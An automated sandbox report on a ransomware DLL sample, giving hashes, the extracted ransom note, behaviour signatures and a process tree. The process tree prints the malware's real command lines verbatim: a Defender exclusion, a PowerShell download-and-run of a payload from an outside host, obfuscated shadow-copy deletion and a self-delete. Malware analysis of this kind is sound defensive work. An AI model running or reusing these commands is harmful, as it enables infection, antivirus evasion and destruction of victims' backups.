Analysis

  • max time kernel
    93s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-12-2024 08:17

General

  • Target

    fccd129f6a5b9d2133d14922a3614f02.dll

  • Size

    206KB

  • MD5

    fccd129f6a5b9d2133d14922a3614f02

  • SHA1

    e814c637e6f0c21f3aa9b43fb92cb161b4d451fc

  • SHA256

    4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e

  • SHA512

    c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979

  • SSDEEP

    3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note
ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours. Contact us email :[email protected] -> [email protected] Attach this file in the email. ID :3E098A148B1E6083149A8FF1E66E4432BDFDF8A776D94FBC257060F848EE5A4965937BF7E42A93DBAF5DEEFCF2A90AFDE13C7022235A57959E6F6BFF2F1B87E8D03904E6EB308C2DD85368287D0288D6729863882CF2088DD501328D92E1B675DA5FC4004836EDC370966B7DF72293DDDA85178D30AB048A37A3A3C7C86420C1A10720BF90F39BE882CE1FFD87BA6AE070F37120A917C515AC9DEFB996EECD8E39474F6AC1E6E1C73957ECCC74322CFF68F84543088F0E5785B9CC165B441366BEAC4759C120A5DE4B6AEA28929F0B064FC1A41C352051E77E35535C01415730D19138E47419EE967EDA12275E3FAB279514CCED9DCBF83729310123C1981F908309FAEE8E9E7BB618916CEF31EEBB8815E9C2DF5C485F40559A5D93B0D7C849E95DFD23D51F272EEA3B72C03B7D5658A05C1DE15AB48740C99E10F1784CE9F8AA9DFC16B5F59C0A819D06B0659D7A9E204020A8650D3590662D3F53862EA565D3D1F95F33F8C35102AD3D6ED1327326478241EB6484C950A198767BCC21CAF1341115E1898263BE2C84D36C006F48D979379D5C99F3A9E579BD633AE018769612338A88A17D1E4F04846C8563AA4BF0536B7418BD1782964BF1B2A5F4A3EF0E35FF6FFCCE2492BEEF56D7B78F2642D0F57358C3EC7EC23913C3434A5F9C657D591C1FC0E6A53DF4FCBE50215E39109A9CA5ED568AE3F29C2F1D31587FAB34FA0D030F13A1709C7049F7590CC8DFB3304514B3C33D5EEAD54C3F0DB7F49FFBC6B52ACD7B523D9D73F9BB15D40B6193AA267A03CF0EAC38F9D087C64D3397B0D684E4D9E4C560B698579D0BBE6A7502696A3431F9093139B2CC8E1A22DF5BA00A804D422324E8746C5CA0E7C5D111067A2AE9061C7DF62F30C17727550F46BF5E12BB865E88A1718A20D81033E123BAD6434318DA21781FE3C7A234AB7277861531B8BC7271A2A77B6F09EB42D73DD29D0AADE5A6F6AE1110E21FD2803E0F387D0A26B0962BE171F6430F77B2954695B752563919D2AEDBC47CD466A8D5480EDF977CE77EFE60B985F6068C5125D1C9E4D8244AF5CBF0CF5B3CFA147A7D2424EF3EB8935338ED1C825DBB96EF9A902FA41629786448128F32981018B1551D658FD05EBB99F022873D76BCB0D0EA1588B36D7E55A97D253E363433EACBBC988C264F3C1B92A40C4C56C74E212F7A18B7CAA4ACF7185F9AE119EE7B62F9EC91BAD961C699A1836D906471BC13C11F8B82D49C86D3AC3A8D590FED533D0C2BC3A25AE479AA89A3A24CA9EEDB0CF993304C5B0132F449A6907FB38E022F3C9A8BCAEFAB82603A4E71CA4AE12943F68C06BCAC50D55772DBBCF89AECFE8EE1EDA55EEBB78BC47592023402B6671AA4DFF5A713DDA3F3D332B582E6608B3D738F985339427B16CFC1CCAE492472F584FD2E146823C80FEF924A1A30AD1472E3EC2F6130498CF214894129016A25D7AEE21D26EBA572EA152D670E297297AAE909A60CC98322240627253DC87E3DBCC69C118F3D4191A3BCEED2F90BCA711D523546FC039452C60D33B338A5778D6D72651AA42B74D01A58C13DC1CDE3CEDFA5E8565024A64E037338DE56D7957E793455DA9017F206F209DCDA739B185EA50C437D5BEB335AE8317B55FC81BFCC9422D3A9FEE207D330AA0E430A8C1544241E45B3D64E3F54F5EFD3413DC35DB8FE3B28239E0A5220A25409138BD05D43CE033322419ABA47AF6107712132BF1B4CCC5B7DDAA1F46AEBC33F83BE39DD5D6F73BC58A619DC308BDABA481CC4BA577A64D3B0CCB50499D4EC66B27CB8CB3C99E55B05929848CBDF976EFC2EEFC8FB7DCE54611D82841132304AAC18240E9295D058E7F8BA062E605FE487A8C2A52945643B29AD2761EA4DE785D05FBFE47FB1335D4301B5CCCF73F27C19451E8B5AF146FD901550A9139B6C841B1AF1C11F21C9C48D56087AF763D18910064E74BAA7F6A46B489660A6BDCF9049A7F92BDB0880C2B962D6DF28AE55609D567A60A5C8D76C67F56C6A2E6E791D1BF42C59063AE6B3A5F3742791435BB10ADFA08DA9DE0204FA92FEE905177F7C4E61C1076AC03EADC1518211FBB6CAC1719BE32B0DD539B7E1B1C1120CDCE192FA2F4F2CA37C21C0481B3A78DB0914952A7D848E72734D614B57708CC378152401DC8AEDB0C65190CE35F4608EE6AA99DBB946A0645C741D60552518B62500B4F3A6F6F7DBFACB45A1C381061742EF01449B82B8FF0549EFBB95820F6FD41B56F9B9C376FE6F0C97BCEBEFC48BF49DDC731F2640B9731ECF7A4BCD6C671CF3713F6F29C32CE8A327F21453AACE98CFAB4E2C7A69F889AF924D1FD1BB0E6A75482FD3CB2842724B695AF2A3545B1BEF7B83AB873F99D6

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1332
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4620
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4932
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c %temp%/eryy65ty.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3564
        • C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe
          C:\Users\Admin\AppData\Local\Temp/eryy65ty.exe
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops desktop.ini file(s)
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4480
          • \??\c:\Windows\system32\wbem\wmic.exe
            c:\uoxnXB\uoxn\..\..\Windows\uoxn\uoxn\..\..\system32\uoxn\uoxn\..\..\wbem\uoxn\uoxnX\..\..\wmic.exe shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4876
          • \??\c:\Windows\system32\wbem\wmic.exe
            c:\jQMmNR\jQMm\..\..\Windows\jQMm\jQMm\..\..\system32\jQMm\jQMm\..\..\wbem\jQMm\jQMmN\..\..\wmic.exe shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3424
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2844
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:1048
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4644

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    16KB

    MD5

    1f10d25cf9e35b61c0725b1de5de2145

    SHA1

    ef6e80d09226155002202e57be34879d6bc563dd

    SHA256

    48dfbf61e6c55a5c1c37d12b5d0994d11c3ebbae7d09e0418dd3022f3ba01396

    SHA512

    53acba644bded5047989bce03cd0fd6c7b28cbebdab1f3d433862e1b13616a741b5da6ad515cae44387314f7e91b17b44b70802b2bcba95f7f24e5fb7288c22e

  • C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

    Filesize

    4KB

    MD5

    5a0c1ac1894f29a35c59d1e4c3bd3c05

    SHA1

    21f41f169ab6a422f8b3a0e7130bae5b5ff8d44d

    SHA256

    ba277385177cf30b0132bbf98c604f60ae09352c8601e70592cc9d4e199fba43

    SHA512

    ef60b6710e72f2617cd1557e50322e046a039302ee377bf5aeca77f185d02f5048e6147b000804aa845709251ad00c58dc50951dabb48d44e435989b81964bec

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmxzkess.vdp.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe

    Filesize

    881KB

    MD5

    9049faba5517305c44bd5f28398fb6b9

    SHA1

    036c6b32f3e7d7d689c9b4d482091eebcc669bfa

    SHA256

    d2100ffe58eb50c05d97a3da738ccd1f0be9672c057c26a10140af80595b78c3

    SHA512

    65a33506f970675775468f80b94a3f8bb2d3672e6fb08fc9f2e5107020095ca6d4bca927c59b72488e2ef4208a64a56ced7511ea14c0445cd50ea3ff9b827f6a

  • memory/4620-32-0x0000000006B20000-0x0000000006B3E000-memory.dmp

    Filesize

    120KB

  • memory/4620-37-0x0000000007870000-0x000000000788A000-memory.dmp

    Filesize

    104KB

  • memory/4620-5-0x0000000005DC0000-0x0000000005DE2000-memory.dmp

    Filesize

    136KB

  • memory/4620-12-0x0000000005ED0000-0x0000000005F36000-memory.dmp

    Filesize

    408KB

  • memory/4620-17-0x0000000005F40000-0x0000000006294000-memory.dmp

    Filesize

    3.3MB

  • memory/4620-18-0x0000000006560000-0x000000000657E000-memory.dmp

    Filesize

    120KB

  • memory/4620-19-0x0000000006580000-0x00000000065CC000-memory.dmp

    Filesize

    304KB

  • memory/4620-21-0x0000000070850000-0x000000007089C000-memory.dmp

    Filesize

    304KB

  • memory/4620-20-0x0000000007500000-0x0000000007532000-memory.dmp

    Filesize

    200KB

  • memory/4620-22-0x0000000074A30000-0x00000000751E0000-memory.dmp

    Filesize

    7.7MB

  • memory/4620-33-0x0000000074A30000-0x00000000751E0000-memory.dmp

    Filesize

    7.7MB

  • memory/4620-0-0x0000000074A3E000-0x0000000074A3F000-memory.dmp

    Filesize

    4KB

  • memory/4620-34-0x0000000007540000-0x00000000075E3000-memory.dmp

    Filesize

    652KB

  • memory/4620-35-0x0000000074A30000-0x00000000751E0000-memory.dmp

    Filesize

    7.7MB

  • memory/4620-36-0x0000000007EC0000-0x000000000853A000-memory.dmp

    Filesize

    6.5MB

  • memory/4620-11-0x0000000005E60000-0x0000000005EC6000-memory.dmp

    Filesize

    408KB

  • memory/4620-38-0x00000000078F0000-0x00000000078FA000-memory.dmp

    Filesize

    40KB

  • memory/4620-39-0x0000000007AF0000-0x0000000007B86000-memory.dmp

    Filesize

    600KB

  • memory/4620-40-0x0000000007A90000-0x0000000007AA1000-memory.dmp

    Filesize

    68KB

  • memory/4620-41-0x0000000007AB0000-0x0000000007ABE000-memory.dmp

    Filesize

    56KB

  • memory/4620-42-0x0000000007AC0000-0x0000000007AD4000-memory.dmp

    Filesize

    80KB

  • memory/4620-43-0x0000000007BB0000-0x0000000007BCA000-memory.dmp

    Filesize

    104KB

  • memory/4620-44-0x0000000007B90000-0x0000000007B98000-memory.dmp

    Filesize

    32KB

  • memory/4620-47-0x0000000074A30000-0x00000000751E0000-memory.dmp

    Filesize

    7.7MB

  • memory/4620-4-0x0000000074A30000-0x00000000751E0000-memory.dmp

    Filesize

    7.7MB

  • memory/4620-1-0x0000000002F50000-0x0000000002F86000-memory.dmp

    Filesize

    216KB

  • memory/4620-3-0x0000000005760000-0x0000000005D88000-memory.dmp

    Filesize

    6.2MB

  • memory/4620-2-0x0000000074A30000-0x00000000751E0000-memory.dmp

    Filesize

    7.7MB

  • memory/4932-58-0x0000000006500000-0x0000000006854000-memory.dmp

    Filesize

    3.3MB